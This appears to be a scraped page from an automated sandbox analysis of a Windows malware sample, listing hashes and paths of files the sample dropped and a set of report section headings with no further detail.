C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqls[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	90E744829865D57082A7F452EDC90DE5	833B178775F39675FA4E55EAB1032353514E1052	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
C:\Users\user\AppData\Local\Temp\5876.exe	PE32 executable (GUI) Intel 80386, for MS Windows	EA9DD1EAE2E521666D3F06382104EC10	46E89AFEB61C1D0852412480EE202D48C7D5ACEB	472785C4ADDBA719D551E2C3AFD1C94AE46140331EB0A50F3EAAE2E0D6C659A9
C:\Users\user\AppData\Local\Temp\EE6.exe	PE32 executable (GUI) Intel 80386, for MS Windows	2095273C7B526065D7094738AA070E1B	6C5A76DD98D42BF2245A249DF4CE32B82AA7A9D3	F3982D6E94DF1A27ABA2B6D04EAAE994A3C806932D8ECB9AD29287AA499E8B28
C:\Users\user\AppData\Local\Temp\katDDA4.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	66064DBDB70A5EB15EBF3BF65ABA254B	0284FD320F99F62ACA800FB1251EFF4C31EC4ED7	6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
C:\Users\user\AppData\Roaming\etrtabd	PE32 executable (GUI) Intel 80386, for MS Windows	C5261E67BD6D58771E27D7214E8F1C8F	6FD857B3EBDB3888785D41F20277BC4E045BF704	09D1EBA82060A4FF75575B471D563A5E02485E0AAA3AFE743802A50D6E987410
C:\Users\user\AppData\Roaming\etrtabd:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309

Windows Analysis Report xvJv1BpknZ.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
xvJv1BpknZ.exe

Malware Threat Intel
Provided by